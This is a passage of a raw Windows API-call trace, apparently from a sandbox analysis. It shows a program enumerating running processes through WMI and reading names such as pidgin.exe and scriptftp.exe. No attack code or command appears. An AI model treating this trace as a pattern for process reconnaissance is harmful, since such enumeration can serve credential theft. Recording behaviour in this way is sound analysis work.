(bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3980\"") returned 0x5e [0265.234] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3980\"") returned 0x5e [0265.234] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.234] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.234] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.235] IUnknown:Release (This=0x601a94) returned 0x1 [0265.235] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.236] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a078) returned 0x0 [0265.236] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a078) returned 0x0 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.236] WbemDefPath:IUnknown:AddRef (This=0x552a078) returned 0x3 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528fe8) returned 0x0 [0265.236] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528fe8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.237] WbemDefPath:IUnknown:Release (This=0x5528fe8) returned 0x3 [0265.237] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.237] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.237] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.237] WbemDefPath:IUnknown:Release (This=0x552a078) returned 0x2 [0265.237] WbemDefPath:IUnknown:Release (This=0x552a078) returned 0x1 [0265.237] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.237] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.237] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a078, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a078) returned 0x0 [0265.237] WbemDefPath:IUnknown:AddRef (This=0x552a078) returned 0x3 [0265.237] WbemDefPath:IUnknown:Release (This=0x552a078) returned 0x2 [0265.237] WbemDefPath:IWbemPath:SetText (This=0x552a078, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3980\"") returned 0x0 [0265.237] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.237] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.237] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.237] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.238] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.238] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.238] IWbemClassObject:Get (in: This=0x552c368, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dce9c*=0, plFlavor=0x23dcea0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x23dce9c*=8, plFlavor=0x23dcea0*=0) returned 0x0 [0265.238] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0265.238] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0265.238] IWbemClassObject:Get (in: This=0x552c368, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dce9c*=8, plFlavor=0x23dcea0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x23dce9c*=8, plFlavor=0x23dcea0*=0) returned 0x0 [0265.238] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0265.238] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0265.238] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.238] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x552b1e0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552b1e0) returned 0x0 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.241] IUnknown:AddRef (This=0x552b1e0) returned 0x3 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552b1e4) returned 0x0 [0265.241] IMarshal:GetUnmarshalClass (in: This=0x552b1e4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.241] IUnknown:Release (This=0x552b1e4) returned 0x3 [0265.241] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.241] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.241] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.242] IUnknown:Release (This=0x552b1e0) returned 0x2 [0265.242] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.242] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.242] IUnknown:QueryInterface (in: This=0x552b1e0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552b1e0) returned 0x0 [0265.242] IUnknown:AddRef (This=0x552b1e0) returned 0x4 [0265.242] IUnknown:Release (This=0x552b1e0) returned 0x3 [0265.242] IUnknown:Release (This=0x552b1e0) returned 0x2 [0265.242] CoTaskMemFree (pv=0x54ba398) [0265.242] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.242] IUnknown:AddRef (This=0x552b1e0) returned 0x3 [0265.242] IWbemClassObject:Get (in: This=0x552b1e0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.242] IWbemClassObject:Get (in: This=0x552b1e0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1864\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.242] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1864\"") returned 0x5e [0265.242] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1864\"") returned 0x5e [0265.242] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.243] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.243] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.243] IUnknown:Release (This=0x601a94) returned 0x1 [0265.244] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0265.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.244] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529eb8) returned 0x0 [0265.244] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0265.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529eb8) returned 0x0 [0265.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.245] WbemDefPath:IUnknown:AddRef (This=0x5529eb8) returned 0x3 [0265.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5529030) returned 0x0 [0265.245] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5529030, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.245] WbemDefPath:IUnknown:Release (This=0x5529030) returned 0x3 [0265.245] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.245] WbemDefPath:IUnknown:Release (This=0x5529eb8) returned 0x2 [0265.245] WbemDefPath:IUnknown:Release (This=0x5529eb8) returned 0x1 [0265.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529eb8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529eb8) returned 0x0 [0265.245] WbemDefPath:IUnknown:AddRef (This=0x5529eb8) returned 0x3 [0265.246] WbemDefPath:IUnknown:Release (This=0x5529eb8) returned 0x2 [0265.246] WbemDefPath:IWbemPath:SetText (This=0x5529eb8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1864\"") returned 0x0 [0265.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.246] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.246] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.246] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.246] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.246] IWbemClassObject:Get (in: This=0x552b1e0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dd728*=0, plFlavor=0x23dd72c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x23dd728*=8, plFlavor=0x23dd72c*=0) returned 0x0 [0265.246] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0265.246] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0265.246] IWbemClassObject:Get (in: This=0x552b1e0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dd728*=8, plFlavor=0x23dd72c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x23dd728*=8, plFlavor=0x23dd72c*=0) returned 0x0 [0265.246] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0265.246] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0265.247] CoTaskMemAlloc (cb=0x4) returned 0x54ba2e8 [0265.247] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2e8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2e8*=0x552c830, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c830) returned 0x0 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.248] IUnknown:AddRef (This=0x552c830) returned 0x3 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.248] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c834) returned 0x0 [0265.248] IMarshal:GetUnmarshalClass (in: This=0x552c834, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.248] IUnknown:Release (This=0x552c834) returned 0x3 [0265.249] IUnknown:QueryInterface (in: This=0x552c830, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 